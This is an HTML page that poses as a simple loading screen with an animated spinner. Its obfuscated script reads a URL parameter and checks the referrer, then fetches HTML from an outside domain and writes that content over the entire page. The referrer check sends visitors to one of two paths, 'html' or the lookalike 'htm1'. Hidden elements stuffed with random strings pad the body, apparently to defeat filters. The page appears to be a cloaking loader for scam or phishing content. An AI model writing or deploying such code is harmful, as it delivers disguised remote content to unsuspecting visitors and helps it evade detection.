<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .CKdzo2q0NEP {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .CKdzo2q0NEP .P6Wa9Ohlq {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .CKdzo2q0NEP .content {
            line-height: 50px;
            text-align: center
        }

        .CKdzo2q0NEP .img {
            width: 100%
        }

        .CKdzo2q0NEP .feCPA5f {
            text-align: center
        }

        .CKdzo2q0NEP .feCPA5f span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .CKdzo2q0NEP .feCPA5f span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .CKdzo2q0NEP .feCPA5f span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .CKdzo2q0NEP .feCPA5f span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .CKdzo2q0NEP .feCPA5f span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .CKdzo2q0NEP .feCPA5f span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .CKdzo2q0NEP .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function E3gLWCN878S(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var RUn0a = E3gLWCN878S('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ RUn0a +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ RUn0a +".html?a=share";
		}
		
        ClqHu5jDu5=url+"#"+new Date().getTime();
        ClqHu5jDu5 && function() {
            $.get(ClqHu5jDu5, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<li style='display:none' >J1tdZjRXoORK85lBSkV54vBEOYhVdoeFYioAItrnkORFUM6RyhYYqb7sQ7VXrhjLtNQcmGdmzOnONRDANqz</li>
<a  href='#' style='display:none'>prY5YTzoWrNBKEhGoFnIY6xj0roA467Qujca3aCR5XXfCwHRzGJVVnroOo2kBgERcGbtZRtwDCsym</a>
<b style='display:none' >dtNIQzsinjRRs83X2qpEX8B7vGtbQXiBUpn9zCKNmc0KC2AzcNUMDIRmuJxjYZ6jURwlFpArEb6AccESoc0Fh3e90</b>
<img  src='' style='display:none'>
<img  src='' style='display:none'>
<ul style='display:none' >pRc1pRYcbUnw522eKTV3TvCCDdCqjWmwGcsnMn6EHKWOSxgaMVnyC</ul>
<ul style='display:none' >pRc1pRYcbUnw522eKTV3TvCCDdCqjWmwGcsnMn6EHKWOSxgaMVnyC</ul>
<span style='display:none'>Ko3XoFBFaD1rCuNNtBKG0Boovw35vd9DRbZT93canSqLEK35hAim1fluXzAM0VdAbrbqj0sLUlGnd8QCLXPlwhGViJvNXci1q</span><div class="CKdzo2q0NEP">
    <div class="P6Wa9Ohlq">
        <div class="feCPA5f">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<img  src='' style='display:none'>
<h1 style='display:none' >eJlRvLudIr15rTAlVTkeEFSNbExFJaEAKPLX3aDrThRboPImCVBTAyByNey5k9ZIto3VGFMhgu6g1K5jgPpLspCLMeX4ahtK02YVq</h1>
<ul style='display:none' >poDXIJVBPmMAsbSsJHPQDH6SInNSjdaqN15UCz8Sq3dFeOsoSCydYyIM5xA4p</ul>
<li style='display:none' >Ug1iniJbFujrPHcOlxSQ8cK1aBpfCOiSg5</li>
<img  src='' style='display:none'></body>
</html>